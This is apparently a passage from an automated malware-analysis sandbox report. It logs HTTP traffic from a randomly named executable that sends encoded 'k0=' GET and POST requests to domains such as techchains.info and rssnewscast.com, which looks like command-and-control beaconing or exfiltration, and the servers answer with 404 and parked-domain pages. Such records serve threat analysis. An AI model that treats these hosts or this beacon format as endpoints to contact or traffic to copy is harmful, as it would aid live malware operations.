                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.54998791.195.240.94804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:02:43.913047075 CET521OUTGET /fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.rssnewscast.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:02:45.221385956 CET1236INHTTP/1.1 200 OK
                                                                                  date: Sat, 07 Dec 2024 06:02:45 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  transfer-encoding: chunked
                                                                                  vary: Accept-Encoding
                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  pragma: no-cache
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RDWq73q0NrYpn1brzL4YsryGIhAvd0v7OU4mMCRVNwv8xMIKz4DzHGR61iHqOR0Hk5twVuhJ9rwhHfjfaIxREg==
                                                                                  last-modified: Sat, 07 Dec 2024 06:02:44 GMT
                                                                                  x-cache-miss-from: parking-f4f7c5ccf-n96cr
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 38 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 52 44 57 71 37 33 71 30 4e 72 59 70 6e 31 62 72 7a 4c 34 59 73 72 79 47 49 68 41 76 64 30 76 37 4f 55 34 6d 4d 43 52 56 4e 77 76 38 78 4d 49 4b 7a 34 44 7a 48 47 52 36 31 69 48 71 4f 52 30 48 6b 35 74 77 56 75 68 4a 39 72 77 68 48 66 6a 66 61 49 78 52 45 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                  Data Ascii: 859<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RDWq73q0NrYpn1brzL4YsryGIhAvd0v7OU4mMCRVNwv8xMIKz4DzHGR61iHqOR0Hk5twVuhJ9rwhHfjfaIxREg==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                  Dec 7, 2024 07:02:45.221416950 CET1236INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                  Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedopark
                                                                                  Dec 7, 2024 07:02:45.221430063 CET1236INData Raw: 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d 61 75
                                                                                  Data Ascii: t:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,text
                                                                                  Dec 7, 2024 07:02:45.221529007 CET1236INData Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b
                                                                                  Data Ascii: ]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:no
                                                                                  Dec 7, 2024 07:02:45.221539974 CET1236INData Raw: 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65
                                                                                  Data Ascii: n-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_
                                                                                  Dec 7, 2024 07:02:45.221553087 CET1236INData Raw: 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d
                                                                                  Data Ascii: e-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration
                                                                                  Dec 7, 2024 07:02:45.221679926 CET776INData Raw: 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72
                                                                                  Data Ascii: text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#555}.container-contact-us{text-align:center}.container-contact-us__content{display:inlin
                                                                                  Dec 7, 2024 07:02:45.221693039 CET1236INData Raw: 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70
                                                                                  Data Ascii: er-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-iC94
                                                                                  Dec 7, 2024 07:02:45.221705914 CET1236INData Raw: 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b
                                                                                  Data Ascii: :solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-
                                                                                  Dec 7, 2024 07:02:45.221719027 CET994INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64
                                                                                  Data Ascii: color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #0
                                                                                  Dec 7, 2024 07:02:45.341567039 CET1236INData Raw: 35 37 36 0d 0a 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41
                                                                                  Data Ascii: 576w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RDWq73q0NrYpn1brzL4YsryGIhAvd0v7OU4mMCRVNwv8xMIKz4DzHGR61iHqOR0Hk5twVuhJ9rwhHfjfaIxREg==","tid":3049,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imp


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.54998866.29.149.46804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:02:59.894686937 CET780OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d
                                                                                  Data Ascii: k0=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                  Dec 7, 2024 07:03:01.062185049 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:00 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.54998966.29.149.46804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:02.594657898 CET800OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e
                                                                                  Data Ascii: k0=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                  Dec 7, 2024 07:03:03.787285089 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:03 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.54999066.29.149.46804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:05.255558968 CET1817OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f 4c [TRUNCATED]
                                                                                  Data Ascii: k0=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx1Z1zVMy9hM/29PYBkWeg640W82hS5bR+73/p1YxFS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp0OcE43JWW7NqLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpqTvXwoZrEGGveh1YUvD1M9uwhS2Djxkp2e8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQpjD2Gsu3STmTn34rqvP3gyE99T1zbRN89ecSSpiwgrnQGzxJxojkTHtDvbDPc2mGlo/980AbVDdw2V4nCfsT9slapAKaq7EEGSeL5i5bH26IQFj/h5ste+eT38btOkmrSX2Uhvlx7+D+TUFcb0rOFOgx6pWk/tKyNXB3rpiYyOR3CiXEqvkhsCKuR2XyVnr3LLe3yV8xHwOTAsZlk9Nr/Hv2Em+zLzYgGBbMENFa0u3f1ylUJeHH8+xGvGM590iI5Uth1I3mxhoJAWDEtppY9LEAiRV+61TFKzUpnM/NRdGOhW5gQEEIRQerBC2R6JTJSEhRMdJ2qTrSzwMCv6VK/n9JXBnu0IG5JtM4G4aYE6Gxt6X1aPY/iCWvNrPXZ4pqgS5iXxHEzdRdodsc9HffbWjYC+3vYu6i5JjkxnT4vfwdN4eDxFbB6sazM4ctju758/LnwlpcqPUKQL9J0uN1KUOJXUXxOtQEXmVLwJAtDjqkYSHfXcx//o/Hx0FG1qN10o4BtUTVzxSFsWF [TRUNCATED]
                                                                                  Dec 7, 2024 07:03:06.501502991 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:06 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 